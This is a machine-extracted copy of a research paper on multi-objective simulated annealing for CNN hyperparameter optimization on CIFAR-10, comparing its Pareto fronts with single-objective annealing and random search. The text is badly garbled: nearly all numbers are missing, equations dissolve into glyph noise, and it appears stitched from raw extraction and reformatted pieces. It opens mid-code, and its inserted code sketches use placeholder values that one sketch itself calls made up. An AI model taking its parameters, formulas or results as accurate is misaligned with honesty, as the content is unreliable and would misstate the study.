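    (p_min, p_max), (e_min, e_max) = objective_bounds(reference)
    ps = [p for p, _ in front]
    es = [e for _, e in front]
    return math.sqrt(((max(ps) - min(ps)) / (p_max - p_min)) ** 2
                     + ((max(es) - min(es)) / (e_max - e_min)) ** 2)

reference = [(110.0, 0.13), (190.0, 0.10), (330.0, 0.085)]   # stand-in aggregate front
candidate = [(130.0, 0.15), (210.0, 0.12), (400.0, 0.10)]
print(generational_distance(candidate, reference), spread(candidate, reference))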
gd að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffip i a d i p aj j ( ) di ¼ min k a� ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi pi �pk pmax �p� � � þ ei �ek emax �e� � � !vuut ( ) zitzler’s spread metric which is computed as in eq. ( ) is used to measure the extent of the fronts. this metric simply calculates euclidean distance between the extreme solutions in a given front. if a front a includes all the extreme solutions in a�, then this front takes a value of according to this metric. s að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi max i a pi �min i a pi pmax �p� ! þ max i a ei �min i a ei emax �e� ! @ a vuuut ( ) gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ spacing metric (schott, ) is used to measure the diversity along a given front. for each solution, distance to its closest neighbor is calculated as shown in eq. ( ). then, the spacing metric is calculated as the standard deviation of these distances as shown in eq. ( ), where �d is the average distance value. if the distance between the closest solutions are distributed equally, then the value of this metric approaches to zero which is the desired condition. di ¼ min k a^k ¼i pi �pkj j max j a pj �min j a pj þ ei �ekj j max j a ej �min j a ej @ a; for i a ( ) sp að Þ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi aj j x i a di � �d � � s ( ) results implementation details solution representation and the search space solutions can be represented with either block (ma et al., ) or layer structure (yamasaki, honma & aizawa, ; sun et al., b). in this study, we adopted the block structure with variable length representation; where the solutions are allowed to expand or shrink dynamically. a new solution is generated by repeating a certain number of convolution and fully connected blocks. a convolution block is composed of a convolution layer (conv), activation function (act), batch normalization (bn), subsampling method (subs) and a dropout function (drop). a fully connected block is composed of a fully connected layer (fc), activation function, batch normalization and a dropout function. this structure can be represented as: conv ! act ! bnð Þ�nc !½ subs ! dropð Þ� �ncb ! fc ! act ! bn ! dropð Þ½ � �nfb, where #conv denotes the number of number of convolution layers in a convolution block, ncb denotes the number of convolution blocks, and nfb denotes and the number of fully connected blocks. we adopted the same dictionary structure given in (ma et al., ) to represent a solution which is given below: conv : ks; kc; p; s; af g#convn¼ ; pool : ksp; sp; pt; dp � � ncb m¼ þ uf ; df ; af � nfb k¼ n o we adopted the same hyper-parameters as in (gülcü & kuş, ), and the full name of the hyper-parameters whose abbreviations are given in the dictionary representation are given in table along with their type and value ranges. 
an example solution that uses the dictionary representation is given below (please refer to table for the abbreviations): {{ncb: , nfb: }, {"conv_block_ ": {"conv" : {#conv: , ks: , kc: , p: same, s : , a: relu}, "pool" : {ksp: , sp: , pt: max, dp . }}, "conv_block_ " : {"conv" : {#conv: , ks: , kc: , p: same, s : , a: relu}, "pool" : {ksp: , sp: , pt: max, dp: . }}} + "fully_block_ " : {uf: , df: . , af: relu}}. gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ local moves mosa algorithm starts by taking vggnet (simonyan & zisserman, ) as the initial solution, and at any iteration, a new solution is created from the current solution by modifying the convolution and fully connected block hyper-parameters as follows: step : add a new convolution block with a probability p which takes a value of . initially, and increases by . times at every iterations. a newly added block inherits all the hyper-parameters from the preceding block. step : select the subsampling method, pooling or strive, with equal probabilities. step : start from the first convolution block, modify each block as follows: if #conv < maximum allowed layer count, then, add a new convolution layer with a p of . ; otherwise, delete the last convolution layer with a p of . modify the convolution layer hyper-parameters with a p of . . if it is decided to be modified, then only one hyper-parameter which is selected randomly is modified. since the same layer hyper-parameters are used within the same block (as in the vggnet architecture), this selection affects all the layers in that block. step : add a new fully connected block in a similar fashion to adding a new convolution block. table hyper-parameters to be optimized, their value types and ranges. hyper-parameter abbreviation value types value ranges convolution (conv) filter size ks numeric , , filter count kc numeric , , , , , , , padding p categorical same** stride s numeric ** activation function f categorical relu, leaky-relu, elu subsampling method – categorical pooling, strive pooling (pool)* filter size ksp numeric , stride sp numeric ** type pt categorical max, avg dropout rate dp numeric . , . , . strive* strive filter size kss numeric , padding ps categorical valid** stride ss numeric ** fully connected number of units uf numeric , , dropout rate df numeric . , . , . activation function af categorical relu, leaky-relu, elu #convolutional layers #conv numeric , , #convolutional blocks ncb numeric , #fully connected layers nfb numeric , notes: * conditioned on subsampling method. ** fixed values. gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step : start from the first fully connected block, modify only one random hyper- parameter with a p of . as in the convolution block. we have observed during the preliminary experiments that the approach of adding a new convolution block with an initial probability of . , and increasing this probability by . times at every iterations, enabled the search reach -block networks around iteration number . with this approach, the probability of adding a new block is increased to . at the end of the th iteration; and at the end of th iteration, it became . allowing the network to grow with roughly % probability. if we had kept this probability constant, -block networks would have been explored for only a few iterations towards the end of the search process. 
experimental setup

mosa parameter tuning
in our study, the mosa algorithm adopts a real-time initial temperature selection strategy in which worsening moves are accepted with an initial probability, p_acc, of . . t_init is then calculated as

t_{init} = -\Delta f_{ave} / \ln(p_{acc})

the average initial worsening penalty amount, \Delta f_{ave}, is approximated by executing a short "burn-in" period in which worsening moves as well as improving ones are all accepted. we run a burn-in period with iterations, and of them resulted in worsening solutions. in table , some information regarding only a few of those iterations is given. in the table, f(x) denotes the number of solutions in a that dominate x plus , |a| denotes the size of the archive, f(x') - f(x) denotes the worsening amount in terms of domination count, and \Delta f denotes the objective value calculated as

\Delta f = \frac{1}{|\tilde{a}|}\left(f(x') - f(x)\right), \quad \text{where } |\tilde{a}| = |a| + .

the average |a| value obtained in this burn-in period is used to calculate \Delta f_{ave}. this period results in a \Delta f_{ave} value of . , which also gives a t_init value of . .

table : worsening moves encountered during the burn-in period (columns: iteration no, f(x), f(x'), |a|, f(x')-f(x), \Delta f; the last row reports the averages).

we adopt a similar temperature adjustment approach to determine the t_final value, where in this case we assumed an f(x') - f(x) value of at most to be accepted with the same probability. in order to calculate t_final, the final front size needs to be approximated; a value of for the final front size seemed reasonable according to preliminary experiments, and t_final is calculated as . .

in this study, the mosa algorithm is allowed to run for a number of iterations defined by the iteration budget of , which means that at most solutions are created during a single run. the amount of this total iteration budget to be allocated to outer and inner iterations is determined by the cooling rate parameter. we tested several cooling rate values while keeping the total number of iterations at , due to the large computational times. table shows the number of outer and inner iterations calculated for different cooling rate values under the same budget and temperature values.

table : the number of outer and inner iterations calculated for different cooling rate values under the same budget and temperature values (columns: iteration budget, t_init, t_final, cooling rate, #outer iterations, #inner iterations).

based on these iteration numbers, we selected cooling rate values of . , . and . for the parameter tuning process. we allowed the mosa algorithm to run times for each of those cooling rate values using different random number seeds. the fronts obtained under each cooling rate value for the three runs are given in fig. .

figure : comparison of mosa fronts under different cooling rates with (a) random seed , (b) random seed , (c) random seed .

as can be seen in the figure, three pareto fronts are obtained for each cooling rate value. although no difference among the fronts formed with different cooling rate values can be noticed visually, we applied the kruskal-wallis h-test to determine whether there are significant differences. this test is applied separately for the gd, spread and front size metrics, but none of those metrics revealed a significant difference among the fronts. therefore, we selected a cooling rate of . arbitrarily.
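the initial-temperature rule and the split of the iteration budget can be written down compactly as below. this is a sketch that assumes the usual geometric cooling schedule t <- cooling_rate * t; the numeric arguments in the example are made up, since they are not part of the text above.

```python
import math

def initial_temperature(delta_f_ave, p_acc=0.5):
    """t_init chosen so that an average worsening move of size delta_f_ave
    is accepted with probability p_acc (p_acc here is a placeholder)."""
    return -delta_f_ave / math.log(p_acc)

def outer_inner_iterations(t_init, t_final, cooling_rate, budget):
    """with geometric cooling, t_final = t_init * cooling_rate**n_outer, so the
    number of outer iterations follows directly; the remaining budget is spent
    as inner iterations per temperature level."""
    n_outer = math.ceil(math.log(t_final / t_init) / math.log(cooling_rate))
    n_inner = budget // n_outer
    return n_outer, n_inner

# example with placeholder values
t0 = initial_temperature(delta_f_ave=0.05, p_acc=0.5)
print(outer_inner_iterations(t0, t_final=0.001, cooling_rate=0.9, budget=500))
```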
cifar dataset
in this study, the cifar- dataset (krizhevsky & hinton, ), which is the most widely-used natural object classification benchmark dataset in hpo and nas studies, is selected as the benchmark dataset. considering the computational cost and the hardware requirements to run the experiments, the selected dataset should be simple, yet complex enough to reveal the differences among different methods or network configurations. many studies consider this dataset as the only benchmark dataset (lu et al., a; wang et al., ; elsken, metzen & hutter, ) due to the fact that it is simpler than the very large-scale imagenet dataset (russakovsky et al., ), but still difficult enough to be used to evaluate the performance of different approaches. the cifar- dataset consists of , × color images in classes, and each class contains , images. the whole dataset is divided into training and test datasets of , and , images, respectively. in most of the studies, the original cifar- training set is split into two sets ( - %) to create the training and validation sets which are used during the search process. we follow a similar approach, with the only difference being that only half of the original training dataset is used during a mosa search process. in order to speed up the search process, a reduced sample of % of the original training samples is selected randomly, and % of this reduced sample is used as the reduced validation set. although this approach might have some negative effects on the performance evaluation of a given configuration, we believe this effect is minimal due to the fact that the aim of the search process is not to accurately measure the error rate of a configuration, but to perform a fair comparison to discriminate good and bad configurations. the original cifar- test set is never used during the mosa search process, and it is only used to obtain the actual test accuracy values of the selected configurations on the final trade-off front. other image classification datasets such as mnist (lecun et al., ), fashion-mnist (xiao, rasul & vollgraf, ) and emnist-balanced (cohen et al., ) are being criticized for having reached their limits and failing to reveal the differences between the algorithms (lu et al., a).

training and evaluation during the search process
during the search process, the classification performance of a generated network configuration is approximated by following the early stopping approach. early stopping is used as a popular method to prevent over-fitting in classical machine learning; however, in the context of automl, and in particular for hpo, it is usually used to cut down the training time of unpromising configurations. based on the evaluations on the validation set, if a poor early-stage performance is observed, then the training process is terminated, and the search moves to a new configuration. this approach not only cuts down the total running time of the hpo method, but also introduces noise and bias into the estimation, as some configurations with bad early-stage performance may eventually turn out to be good after sufficient training (yao et al., ).
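a minimal keras-style sketch of this early-stopping evaluation step is given below. the split fraction, patience, epoch cap and batch size are placeholders standing in for the values reported in the next paragraph, and build_model is an assumed helper that turns a solution dictionary into a keras model compiled with metrics=["accuracy"].

```python
from tensorflow import keras

def evaluate_configuration(build_model, solution, x_train, y_train,
                           val_fraction=0.2, patience=3, max_epochs=30,
                           batch_size=128):
    """train a candidate configuration with early stopping and return the
    lowest validation error observed; this noisy estimate is what the search
    uses to compare configurations."""
    n_val = int(len(x_train) * val_fraction)
    x_tr, y_tr = x_train[:-n_val], y_train[:-n_val]
    x_val, y_val = x_train[-n_val:], y_train[-n_val:]

    model = build_model(solution)  # assumption: dict -> compiled keras model
    stopper = keras.callbacks.EarlyStopping(monitor="val_loss",
                                            patience=patience,
                                            restore_best_weights=True)
    history = model.fit(x_tr, y_tr,
                        validation_data=(x_val, y_val),
                        epochs=max_epochs,
                        batch_size=batch_size,
                        callbacks=[stopper],
                        verbose=0)
    return 1.0 - max(history.history["val_accuracy"])
```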
at each mosa iteration, a newly generated configuration is trained using the training split of the original training set and is evaluated on the validation set, which is the test split of the original training set. the xavier weight initializer and the adam optimizer with a learning rate of . are used, and the batch size is selected as . for a given configuration, if the best loss achieved on the validation set is not improved after three consecutive epochs, then the training process is terminated. a configuration is allowed to be trained for at most epochs. in a mosa run with iterations, we observe that the average number of epochs is . . this epoch count seems reasonable considering the epoch counts used in similar studies: a minimum of epochs in lu et al. ( a) and epochs in elsken, metzen & hutter ( ). all experiments are performed on a single nvidia ti gpu using keras (chollet et al., ), and the code and the raw evaluation results are available at https://github.com/zekikus/mosa-cnn-hyperparams-optimization.

training after the search process
the mosa algorithm is run for iterations, and each run is repeated three times using different random seeds. from each of the three trade-off fronts, some non-dominated configurations are selected and then trained for longer epochs on the original cifar- training dataset in order to measure their actual classification performance. from each front, three configurations with the lowest error rates are selected, and each solution is trained for epochs with a batch size of using the standard stochastic gradient descent (sgd) back-propagation algorithm with the following parameter values: learning rate = . , decay = e− and momentum = . (default values in keras). as mentioned earlier, the original test set is never used during training; it is only used at this stage to test the performance of the selected networks. to improve the test performance, we only utilized an online augmentation routine that is used in many peer studies. this process, which is also called augmentation on the fly, is especially preferred for larger datasets where an increase in size cannot be afforded. sequential transformations of padding, random crop and horizontal flip are applied to the mini-batches during training (he et al., ; huang et al., ). in some studies, training performance is further improved by additional operations; for example, lu et al. ( b) append an auxiliary head classifier to the architecture, but we did not follow such approaches that require manual intervention after the search process.

results analysis
we first present the objective space distribution of all configurations obtained during each independent run of the mosa. in order to show the search ability of the proposed
the configurations generated by the mosa are compared to both human designed state-of-the-art configurations and the configurations generated by other search methods like evolutionary algorithms in terms of the test error, the number of flops, the number of parameters and also the search cost which is reported as gpu-days. fronts analysis a mosa search is repeated three times with different initial random seeds, and the objective space distribution of all configurations encountered during each of those search processes are illustrated in fig. . in all of those runs, sa especially focuses on the areas with small classification error but with large number of flops, es expected. in order to show the search ability of the mosa over the sa, we compare the final fronts generated by each method in terms of closeness to the pareto-optimal front and the diversity of the figure comparison of mosa and sa search ability in terms of objective space distribution and the pareto fronts with (a) random seed: , (b) random seed: , (c) random seed: . full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solutions along the fronts. the configurations generated by the sa seem to be much complex than the configurations generated by the mosa which also takes into account the complexity as the other objective. due to the large computational time requirement (at least × longer), sa is run only once. as there is no archive mechanism in the sa, the final sa front is formed by selecting all non-dominated configurations encountered during a single run. the mosa and the sa fronts are also shown in fig. along with the objective space distributions of those algorithms. in addition to making comparison using graphical plots, we used the metrics given in “performance evaluation criteria” to compare the fronts generated by each approach in a quantitative manner. these metrics are as follows: generational distance (gd), spread (s) and spacing (sp) metrics. the comparison results using these metrics are given in table . in the table, mosa_ represents the mosa front obtained at the first run, and mosa_ represents the mosa front obtained at the second run and so on. gd of each front is calculated with respect to a� which is formed by combining all four fronts. s of each front is calculated with respect to the extreme points considering again all four fronts. sp metric is calculated for each front separately, because it measures within front distribution quality of a given front. the search ability of the proposed method is also validated by comparing it to the rs method. the same comparisons performed between the mosa and the sa are applied to compare the mosa and the rs methods. when the mosa and the rs solutions are combined to create a�, none of the rs front solutions take place in a� as in the case of sa. a� is composed of only the solutions coming from the mosa which means that gd calculations are made against the same reference front; therefore we decided to present all these comparison results on the same table, table . figure illustrates the objective space distribution and the fronts obtained by the mosa and the rs methods. 
after search analysis
in order to measure the actual classification performance of the configurations generated by the mosa method, nine configurations are selected and subjected to longer training using the original cifar- training dataset, as detailed in "training after the search process". among these nine configurations, the networks with the lowest error rates are selected for comparison with the networks reported in the literature. as the mosa algorithm considers two objectives, namely the error rate and the flops, during the search process, a multi-objective comparison with respect to the front evaluation metrics should be performed for a fair comparison. unfortunately, most of the studies do not report the objective values of the solutions in the final fronts, or they consider different objective functions to estimate the complexity of the generated networks. in some studies, computational complexity is measured as computational time in gpu-days. however, a comparison with respect to computational time may not be reliable due to external factors such as the temperature in the computing environment, even if the same gpu models are used for the experiments. therefore, the number of flops that a network carries out during a forward pass is the most reliable complexity measure. in table , the final performance of three mosa configurations in terms of both objectives is presented. in addition, a graphical comparison is given in fig. , where the dominance relations between different configurations can be easily noticed. as in "fronts analysis", a comparison to the configurations found with the single-objective sa algorithm is also performed, and the results are presented in the table in order to show the effect of using a multi-objective solution approach for this bi-objective optimization problem. from the sa trade-off front, three configurations with the lowest error rates are selected for longer training, and the performance of each configuration is reported in the table. the same approach is followed for the rs as well. other search-generated architectures are included in the second part of the table. in the table, the accuracy, the number of flops and the number of parameters columns all represent the values reported in the original papers.

figure : visual comparison of mosa and rs search ability in terms of objective space distribution and the pareto fronts with (a) random seed , (b) random seed , (c) random seed .

as stated before, we did not consider the search cost in terms of time in the comparisons; however, in order to give an idea about the search cost of the mosa algorithm, we ran one mosa search on the same gpu as in nsga-net (lu et al., a). we observe that mosa takes hours on a single nvidia ti gpu, which equals . gpu-days, whereas it takes gpu-days for nsga-net. a comparison of the mosa configurations to the human-designed state-of-the-art configurations is also performed.
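for reference, the flops objective used throughout these comparisons is usually approximated layer by layer. the sketch below shows the common multiply-accumulate approximation; it is not necessarily the exact counting procedure used in the paper, and the example numbers are made up.

```python
def conv_flops(h_out, w_out, c_in, c_out, kernel_size):
    """flops of one convolution layer (2 ops per multiply-accumulate);
    stride and padding enter only through the output spatial size."""
    return 2 * h_out * w_out * c_out * (kernel_size * kernel_size * c_in)

def dense_flops(n_in, n_out):
    """flops of one fully connected layer."""
    return 2 * n_in * n_out

# example: a 3x3 convolution producing 64 maps from a 32x32x32 input
print(conv_flops(32, 32, 32, 64, 3) / 1e6, "mflops")
```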
in order to be able to make a fair comparison, especially in terms of test accuracy, each of these state-of-the-art architectures is rebuilt and trained using the same augmentation techniques as in the mosa training process. the results are presented in table .

table : comparison of mosa architectures to other search-generated architectures (columns: architecture, search method, test accuracy (%), flops (m), parameters (m); rows: three mosa solutions (mosa), three sa solutions (sa), three rs solutions (rs), nsga-net (lu et al., b; ea), ppp-net (dong et al., ; ea), amoebanet-a + cutout (real et al., ; ea) and nasnet-a + cutout (zoph et al., ; rl)).

figure : comparison of the final performance of the networks in terms of both the error rate and the number of flops.

discussion
the mosa and the sa algorithms are allowed to run for the same number of iterations. an archive is maintained to collect all non-dominated solutions that have been encountered throughout the search process. the mosa also incorporates a return-to-base strategy, which allows further exploitation of the archive solutions. moreover, it uses a dominance-based acceptance rule as the decision criterion. the cifar- dataset, which is the most widely-used natural object classification benchmark dataset, is used to compare the performance of the different approaches. we first compare the search ability of the mosa and the sa algorithms using the trade-off fronts obtained by each method. the objective space distribution of all configurations encountered during a sa search process is used to form the trade-off front consisting of only non-dominated solutions. the mosa and the sa fronts are then compared with respect to three multi-objective evaluation metrics. according to the results based on the generational distance, spread and spacing metrics, the mosa algorithm is able to generate better fronts than the sa method. when the objective space distributions of the two methods are compared visually, one can see that the single-objective sa focuses on the part of the objective space with small error rates regardless of the number of flops, as expected. on the other hand, the mosa focuses on the part of the objective space with both small error rates and a small number of flops. when the two algorithms are compared in terms of front cardinality, one can see that the mosa is able to generate more solutions. when the mosa fronts are compared to the rs front, it is observed that each of the three mosa fronts yields a better spread value than the rs front. for the other metrics, while the best value is always achieved by a mosa front, the rs yields competitive results. while this front analysis is important in terms of providing some indications about the search ability of the algorithms, a more reliable comparison can be made after training the solutions in the trade-off front for longer epochs in order to get their accuracy on the original test set. however, due to the computational cost of this training process, only the selected solutions are allowed to run for longer training epochs.

table : comparison of mosa architectures to human-designed state-of-the-art architectures (columns: architecture, test accuracy (%), flops (m), parameters (m); rows: three mosa solutions, lenet- (lecun et al., ), vggnet- (simonyan & zisserman, ), resnet- (he et al., ) and densenet- (huang et al., )).

when the mosa and the sa configurations are compared after this long training process,
the results show that the sa performs slightly better than the mosa under a single-objective setting. however, when the complexity in terms of both the flops count and the number of parameters is considered, the mosa solutions are superior to the sa solutions. when it comes to the comparison with the rs solutions, the results suggest that all rs solutions are dominated by at least one mosa solution. the mosa configurations are also compared to the configurations obtained by other search methods, such as evolutionary algorithms and reinforcement learning methods. although the results might suggest a poor mosa performance in terms of test accuracy, the other objective, flops, should also be taken into account for a fair comparison. moreover, most of these approaches include complex augmentation strategies in order to boost the final test accuracy. when both the test accuracy and the complexity are considered, it is shown that the mosa configurations are not dominated by any of those architectures, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. it can also be concluded that the mosa, which is a single-stage algorithm, is able to generate high-quality solutions under limited computational resources.

conclusions
in this study, we model the cnn hyper-parameter optimization problem as a bi-objective optimization problem considering two competing objectives, namely the classification accuracy and the computational complexity, which is measured in terms of the number of floating point operations. for this bi-criteria hyper-parameter optimization problem, we develop a mosa algorithm with the aim of obtaining high-quality configurations in terms of both objectives. cifar- is selected as the benchmark dataset, and the mosa trade-off fronts obtained for this dataset are compared to the fronts generated by a single-objective sa algorithm with respect to three front evaluation metrics. the results show that the mosa algorithm is able to search the objective space more effectively than the sa method. some non-dominated solutions generated by both the mosa and the sa search processes are selected for longer training in order to obtain their actual accuracy values on the original test set. the results again suggest that the mosa performs better than the sa under a bi-objective setting. the mosa configurations are also compared to the configurations obtained by other search methods, such as population-based algorithms and reinforcement learning methods. it can be concluded that the mosa, which is a single-stage algorithm, is able to generate high-quality solutions under limited computational resources, and it can be of great use when the computational complexity and time are as important as the accuracy.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
the authors declare that they have no competing interests.
https://peerj.com/computer-science/ author contributions ayla gülcü conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. zeki kuş conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code and raw results are available at github: https://github.com/zekikus/mosa-cnn- hyperparams-optimization. references back t. . evolutionary algorithms in theory and practice: evolution strategies, evolutionary programming, genetic algorithms (first press). new york: oxford university press. bandyopadhyay s, saha s, maulik u, deb k. . a simulated annealing-based multiobjective optimization algorithm: amosa. ieee transactions on evolutionary computation ( ): – . bergstra j, bengio y. . random search for hyper-parameter optimization. journal of machine learning research : – . chollet f, others. . keras. github. available at https://github.com/fchollet/keras. cohen g, afshar s, tapson j, van schaik a. . emnist: extending mnist to handwritten letters. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . czyzżak p, jaszkiewicz a. . pareto simulated annealing—a metaheuristic technique for multiple-objective combinatorial optimization. journal of multi-criteria decision analysis ( ): – doi . /(sici) - ( ) : < ::aid-mcda > . .co; - . deb k. . multi-objective optimization using evolutionary algorithms. vol. . hoboken: john wiley & sons. dong jd, cheng ac, juan dc, wei w, sun m. . ppp-net: platform-aware progressive search for pareto-optimal neural architectures. in: iclr workshop ( ). available at https://openreview.net/pdf?id=b nt taim. eberhart r, kennedy j. . particle swarm optimization. in: proceedings of the ieee international conference on neural networks. vol. . piscataway: ieee, – . elsken t, metzen jh, hutter f. . efficient multi-objective neural architecture search via lamarckian evolution. arxiv arxiv: . . elsken t, metzen jh, hutter f. . neural architecture search: a survey. arxiv arxiv: . . feurer m, hutter f. . hyperparameter optimization. in: automated machine learning. cham: springer, – . goodfellow i, bengio y, courville a. . deep learning. vol. . cambridge: mit press. gülcü a, kuş z. . hyper-parameter selection in convolutional neural networks using microcanonical optimization algorithm. ieee access : – doi . /access. . . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/zekikus/mosa-cnn-hyperparams-optimization https://github.com/zekikus/mosa-cnn-hyperparams-optimization https://github.com/fchollet/keras http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-mcda % e . .co; - https://openreview.net/pdf?id=b nt taim http://dx.doi.org/ . /access. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . hoffman mw, shahriari b. . modular mechanisms for bayesian optimization. in: proceedings nips workshop bayesian optimization. – . holland jh. . genetic algorithms. scientific american ( ): – doi . /scientificamerican - . 
huang g, liu z, van der maaten l, weinberger kq. . densely connected convolutional networks. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . kim yh, reddy b, yun s, seo c. . nemo: neuro-evolution with multiobjective optimization of deep neural network for speed and accuracy. in: jmlr: workshop and conference proceedings. vol. . – . kirkpatrick s, gelatt cd, vecchi mp. . optimization by simulated annealing. science ( ): – doi . /science. . . . konak a, coit dw, smith ae. . multi-objective optimization using genetic algorithms: a tutorial. reliability engineering & system safety ( ): – doi . /j.ress. . . . krizhevsky a, hinton g. . learning multiple layers of features from tiny images. technical report. university of toronto. available at https://www.cs.toronto.edu/~kriz/learning- features- -tr.pdf. lecun y, boser be, denker js, henderson d, howard re, hubbard we, jackel ld. . handwritten digit recognition with a back-propagation network. in: advances in neural information processing systems. burlington: morgan kaufmann, – . lecun y, bottou l, bengio y, haffner p. . gradient-based learning applied to document recognition. proceedings of the ieee ( ): – doi . / . . li l, talwalkar a. . random search and reproducibility for neural architecture search. in: uncertainty in artificial intelligence. amsterdam: elsevier, – . liu h, simonyan k, vinyals o, fernando c, kavukcuoglu k. . hierarchical representations for efficient architecture search. arxiv arxiv: . . liu h, simonyan k, yang y. . darts: differentiable architecture search. available at http://arxiv.org/abs/ . . lu z, whalen i, boddeti v, dhebar y, deb k, goodman e, banzhaf w. a. nsga-net: neural architecture search using multi-objective genetic algorithm. in: proceedings of the genetic and evolutionary computation conference. – . lu z, whalen i, dhebar y, deb k, goodman e, banzhaf w, boddeti vn. b. multi-criterion evolutionary design of deep convolutional neural networks. arxiv arxiv: . . ma b, li x, xia y, zhang y. . autonomous deep learning: a genetic dcnn designer for image classification. neurocomputing : – doi . /j.neucom. . . . real e, aggarwal a, huang y, le qv. . regularized evolution for image classifier architecture search. in: proceedings of the aaai conference on artificial intelligence. vol. . – doi . /aaai.v i . . real e, moore s, selle a, saxena s, suematsu yl, tan j, le q, kurakin a. . large-scale evolution of image classifiers. in: proceedings of the th international conference on machine learning. vol. . – . russakovsky o, deng j, su h, krause j, satheesh s, ma s, huang z, karpathy a, khosla a, bernstein m, berg ac, fei-fei l. . imagenet large scale visual recognition challenge. international journal of computer vision ( ): – . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /scientificamerican - http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /j.ress. . . https://www.cs.toronto.edu/~kriz/learning-features- -tr.pdf https://www.cs.toronto.edu/~kriz/learning-features- -tr.pdf http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /aaai.v i . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ schott jr. . fault tolerant design using single and multi-criteria genetic algorithms. master’s thesis, boston, ma: department of aeronautics and astronautics, massachusetts institute of technology. available at http://hdl.handle.net/ . / . simonyan k, zisserman a. . 
very deep convolutional networks for large-scale image recognition. available at http://arxiv.org/abs/ . . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv arxiv: . . smith ki, everson rm, fieldsend je. . dominance measures for multi-objective simulated annealing. in: proceedings of the congress on evolutionary computation (ieee cat. no. th ). vol. . piscataway: ieee, – . smith ki, everson rm, fieldsend je, murphy c, misra r. . dominance-based multiobjective simulated annealing. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . springenberg jt, dosovitskiy a, brox t, riedmiller m. . striving for simplicity: the all convolutional net. available at http://arxiv.org/abs/ . . suganuma m, shirakawa s, nagao t. . a genetic programming approach to designing convolutional neural network architectures. in: proceedings of the genetic and evolutionary computation conference. – . suman b. . study of simulated annealing based algorithms for multiobjective optimization of a constrained problem. computers & chemical engineering ( ): – doi . /j.compchemeng. . . . suman b, kumar p. . a survey of simulated annealing as a tool for single and multiobjective optimization. journal of the operational research society ( ): – doi . /palgrave.jors. . sun y, xue b, zhang m, yen gg. a. evolving deep convolutional neural networks for image classification. in: ieee transactions on evolutionary computation. piscataway: ieee. sun y, xue b, zhang m, yen gg. b. completely automated cnn architecture design based on blocks. ieee transactions on neural networks and learning systems : – . suppapitnarm a, seffen ka, parks gt, clarkson pj. . a simulated annealing algorithm for multiobjective optimization. engineering optimization ( ): – doi . / . ulungu el, teghem jfph, fortemps ph, tuyttens d. . mosa method: a tool for solving multiobjective combinatorial optimization problems. journal of multi-criteria decision analysis ( ): – doi . /(sici) - ( ) : < ::aid-mcda > . .co; -o. van veldhuizen da, lamont gb. . multiobjective evolutionary algorithms: analyzing the state-of-the-art. evolutionary computation ( ): – . wang b, sun y, xue b, zhang m. . evolving deep neural networks by multi-objective particle swarm optimization for image classification. in: proceedings of the genetic and evolutionary computation conference. – . weng ch, lai yh, lai sh. . driver drowsiness detection via a hierarchical temporal deep belief network. in: asian conference on computer vision. cham: springer, – . xiao h, rasul k, vollgraf r. . fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. available at http://arxiv.org/abs/ . . xie l, yuille a. . genetic cnn. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://hdl.handle.net/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /tevc. . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.compchemeng. . . http://dx.doi.org/ . /palgrave.jors. http://dx.doi.org/ . / http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-mcda % e . .co; -o http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yamasaki t, honma t, aizawa k. . efficient optimization of convolutional neural networks using particle swarm optimization. in: ieee third international conference on multimedia big data. piscataway: ieee, – . yao q, wang m, chen y, dai w, li y-f, tu w-w, yang q, yang y. . 
